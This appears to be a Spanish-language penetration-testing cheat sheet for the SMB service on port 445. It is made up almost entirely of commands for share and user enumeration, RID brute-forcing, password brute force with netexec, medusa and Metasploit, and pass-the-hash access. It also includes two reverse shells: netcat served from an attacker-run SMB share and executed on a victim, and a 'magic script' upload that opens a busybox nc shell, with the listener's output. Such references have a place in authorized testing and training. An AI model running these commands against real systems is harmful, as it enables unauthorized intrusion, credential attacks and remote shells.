⚪ 445 - SMB (TCP)

Información

Server Message Block (SMB) es un protocolo de red que permite compartir archivos e impresoras entre nodos de una red de computadoras que usan el sistema operativo Microsoft Windows.

Puerto Estándar: 445
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Si Nmap no obtiene el encabezado del servicio, consultará la DB IANA para determinar el servicio asociado al puerto.

Enumeración

Básica

Mediante una enumeración básica obtendremos información relacionada con el dominio, SO, arquitectura y firma (SMB signing).

netexec smb 192.168.1.2

Normal

nmap -p445 -sS 192.168.1.2
nmap -p445 -sVC 192.168.1.2

Vulnerabilidades

nmap -p445 --script="smb-vuln*" 192.168.1.2
nmap -p445 --script="vuln and safe" 192.168.1.2
nmap -p445 --script="smb-enum-*" 192.168.1.2

Validar Credenciales

# password
netexec smb 192.168.1.2 -u administrator -p 'Passsword123!'
netexec smb 192.168.1.2 -u administrator -p 'Passsword123!' --local-auth
# hash
netexec smb 192.168.1.2 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'
netexec smb 192.168.1.2 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e' --local-auth

Shares

Listar

Null Session
smbclient -NL //192.168.1.2

smbmap --no-banner -H 192.168.1.2
smbmap --no-banner -H 192.168.1.2 -u '' -p ''

netexec smb 192.168.1.2 --shares
netexec smb 192.168.1.2 -u '' -p '' --shares
Authenticated
netexec smb 192.168.1.2 --shares -u 'peter' -p 'rockyou'
smbclient -L //192.168.1.2 -U "peter%rockyou"
smbmap -H 192.168.1.2 -u 'peter' -p 'rockyou'

Acceder

Null Session
# null session
smbclient -N //192.168.1.2/server
# error -> protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED (suele indicar que el servidor solo acepta SMB1/NT1; la opción siguiente fuerza ese dialecto antiguo)
smbclient -N //192.168.1.2/server --option='client min protocol=NT1'

netexec smb 192.168.1.2 -u '' -p '' --spider server --regex .

smbmap -H 192.168.1.2 -u ' ' -p ' ' -r server
Authenticated
Password
smbclient //192.168.1.2/server -U "peter%rockyou"
netexec smb 192.168.1.2 -u 'peter' -p 'rockyou' --spider server --regex .
smbmap -H 192.168.1.2 -u 'peter' -p 'rockyou' -r server
Hash
pth-smbclient //192.168.1.2/server -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
pth-smbclient //192.168.1.2/server -p 3000 -U 'peter%00000000000000000000000000000000:3B4C57484504038C2F2E94861D507BA7'
smbclient //192.168.1.2/server -U peter --pw-nt-hash 'F9FE0310AF66C797A73CB60B1953FCD7'
smbclient //192.168.1.2/server -U peter --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7' -p 3000

Levantar

Null Session
impacket-smbserver a . -smb2support
C:\victim\>copy \\192.168.1.2\a\nc.exe nc.exe
C:\victim\>\\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443
Authenticated
impacket-smbserver a . -smb2support -username hacker -password Password123
C:\victim\> net use x: \\192.168.1.2\a /user:hacker Password123
C:\victim\> dir x:\
C:\victim\> copy x:\nc.exe nc.exe

File Transfer

# upload
smb: \> put cmd.php
# download
smb: \> get config.php
smbmap -H 192.168.1.2 --download SYSVOL/Groups/Groups.xml
smbmap -H 192.168.1.2 -u admin -p Passw0rd123! --download 'users$/mhope/azure.xml'
smbmap -H 10.129.228.253 -u 'guest' -p '' --download Public/'SQL Server Procedures.pdf'

smbclient -N //192.168.1.2/folder
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

netexec smb 10.129.228.253 -u 'guest' -p '' --share Public --get-file "SQL Server Procedures.pdf" "SQLServerProcedures.pdf"

smbget -R smb://192.168.1.2/folder$ -U "usuario"
smbget -R smb://192.168.1.2/folder$ -U "usuario%password"

Users

netexec smb 192.168.1.2 --users

enum4linux 192.168.1.2
enum4linux 192.168.1.2 -u 'hope' -p 'loser'
enum4linux -U 192.168.1.2

RPC

# null session
rpcclient -NU "" 192.168.1.2 -c "enumdomusers"
rpcclient -NU "" 192.168.1.2 -c "enumdomusers" | grep -oP '\[.*?\]' |tr -d '[]' |grep -v '0x' > users.dic
rpcclient -NU "" 192.168.1.2 -c "querydispinfo and enumdomusers"
rpcclient -NU "" 192.168.1.2 -c "querydispinfo and enumdomusers" | awk '{print $8}'

RIDs

Linux
netexec smb 192.168.1.2 --rid-brute

# range (obtener primero el SID base resolviendo un nombre conocido)
rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames root'
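# default port
# for (( )) replaces $(seq …), and rpcclient runs directly instead of
# re-parsing an interpolated string through an extra `bash -c`.
# -U '%' is an empty user and an empty password (null session).
for ((i = 1000; i <= 1005; i++)); do
  rpcclient -W '' -U '%' 192.168.1.2 -c "lookupsids S-1-22-1-${i}"
done
# other port
for ((i = 1000; i <= 1005; i++)); do
  rpcclient -W '' -U '%' 192.168.1.2 -p 1234 -c "lookupsids S-1-22-1-${i}"
done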
Windows
netexec smb 192.168.1.2 --rid-brute

# range (obtener primero el SID base resolviendo un nombre conocido)
rpcclient -W '' -U ''%'' 192.168.1.2 -c 'lookupnames administrator'
rpcclient -U 'administrator%Password123' 192.168.1.2 -c 'lookupnames administrator'
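# default port
# for (( )) replaces $(seq …), and rpcclient runs directly instead of
# re-parsing an interpolated string through an extra `bash -c` (a quote
# in the password would have broken the inner command line).
# -U '%' is an empty user and an empty password (null session).
for ((i = 500; i <= 1150; i++)); do
  rpcclient -W '' -U '%' 192.168.1.2 -c "lookupsids S-1-5-21-172782897-4107608896-4177437455-${i}"
done | grep -v "unknown"
# authenticated; the credential is still passed on argv and is visible in
# the process list while each rpcclient runs.
for ((i = 500; i <= 1150; i++)); do
  rpcclient -W '' -U 'administrator%Password123' 192.168.1.2 -c "lookupsids S-1-5-21-172782897-4107608896-4177437455-${i}"
done | grep -v "unknown"
# same, additionally dropping the lines whose SID type is (2) or (4)
# (presumably domain groups and aliases, leaving user accounts).
for ((i = 500; i <= 1150; i++)); do
  rpcclient -W '' -U 'administrator%Password123' 192.168.1.2 -c "lookupsids S-1-5-21-172782897-4107608896-4177437455-${i}"
done | grep -vE "unknown|\(2\)|\(4\)"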

Brute Force

netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --local-auth
netexec smb 192.168.1.2 -u peter -p rockyou.txt --continue-on-success

medusa -h 192.168.1.2 -u peter -P rockyou.txt -M smbnt -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M smbnt -v 4 -f
medusa -h 192.168.1.2 -u peter -P rockyou.txt -t 10 -M smbnt -v 4 -f 2>/dev/null

Metasploit

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set RHOST 192.168.1.2
msf6 auxiliary(scanner/smb/smb_login) > set SMBuser peter
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set VERBOSE false
msf6 auxiliary(scanner/smb/smb_login) > set STOP_ON_SUCCESS true
msf6 auxiliary(scanner/smb/smb_login) > set THREADS 10
msf6 auxiliary(scanner/smb/smb_login) > run

Magic Script

Si tenemos acceso a un share y en él existe definido un Magic Script, podemos subir un script con el mismo nombre que contenga una reverse shell; será interpretado por el usuario que levanta el servicio SMB, obteniendo así una shell.

Contenido del archivo smb.conf donde se carga el Magic Script llamado config.sh:

[tmp]
    comment = Temp Directory
    browseable = yes
    valid users = xerosec
    read only = no
    magic script = config.sh
    create mask = 0700
    directory mask = 0700
    path = /tmp/

Generar un script con el mismo nombre (config.sh) y subirlo al share:

 cat config.sh
busybox nc 192.168.1.10 443 -e /bin/sh

smb: \> put config.sh

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.95] 60482
id ; hostname 
uid=1000(xerosec) gid=1000(xerosec) grupos=1000(xerosec)
magic

© d4t4s3c 2023-2025
